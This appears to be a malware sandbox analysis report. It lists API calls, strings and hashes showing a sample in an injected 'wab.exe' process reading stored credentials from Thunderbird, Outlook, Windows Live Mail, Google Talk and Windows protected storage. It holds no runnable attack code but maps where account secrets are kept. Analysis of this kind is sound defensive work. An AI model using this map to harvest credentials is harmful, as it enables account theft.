                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              APIs
                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                              • memcmp.MSVCRT ref: 00408B2B
                                                              • memcmp.MSVCRT ref: 00408B5C
                                                              • memcpy.MSVCRT ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Execution Graph

                                                              Execution Coverage: 2.3%
                                                              Dynamic/Decrypted Code Coverage: 20.8%
                                                              Signature Coverage: 0.5%
                                                              Total number of Nodes: 832
                                                              Total number of Limit Nodes: 16
32915->32914 34152 434395 16 API calls 33966 441d9c memcmp 34154 43f79b 119 API calls 33967 40c599 43 API calls 34155 426741 87 API calls 33971 4401a6 21 API calls 33973 426da6 memcpy memset memset memcpy 33974 4335a5 15 API calls 33976 4299ab memset memset memcpy memset memset 33977 40b1ab 8 API calls 34160 425115 76 API calls __fprintf_l 34164 4113b2 18 API calls 2 library calls 34168 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33979 40b5bf memset memset _mbsicmp

                                                              Control-flow Graph
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                              Control-flow Graph
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
                                                              • strlen.MSVCRT ref: 00407F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • _mbscpy.MSVCRT ref: 00402177
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 1846531875-4223776976
                                                              • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT ref: 00403E54
                                                              Strings
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                              Control-flow Graph
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT ref: 0040FBE4
                                                              • memcpy.MSVCRT ref: 0040FBF9
                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                              • API String ID: 2768085393-2409096184
                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                              Control-flow Graph
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • Store Root, xrefs: 004443A5
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F567
                                                              • memset.MSVCRT ref: 0040F57F
                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT ref: 0040F652
                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                              Similarity
                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                              • String ID:

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • memset.MSVCRT ref: 004037EB
                                                              • memset.MSVCRT ref: 004037FF
                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              • strchr.MSVCRT ref: 0040386E
                                                              • _mbscpy.MSVCRT ref: 0040388B
                                                              • strlen.MSVCRT ref: 00403897
                                                              • sprintf.MSVCRT ref: 004038B7
                                                              • _mbscpy.MSVCRT ref: 004038CD
                                                              Similarity
                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                              • String ID: %s@yahoo.com

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • _mbscpy.MSVCRT ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Similarity
                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:

                                                               Control-flow Graph (rendered graph not reproduced)

                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                              Strings
                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                              • String ID: Software\Google\Google Talk\Accounts

                                                               Control-flow Graph (rendered graph not reproduced)
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • _mbscpy.MSVCRT ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                              Similarity
                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              Similarity
                                                              • API ID: ??3@mallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3831604043-0
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFontIndirect_mbscpymemset
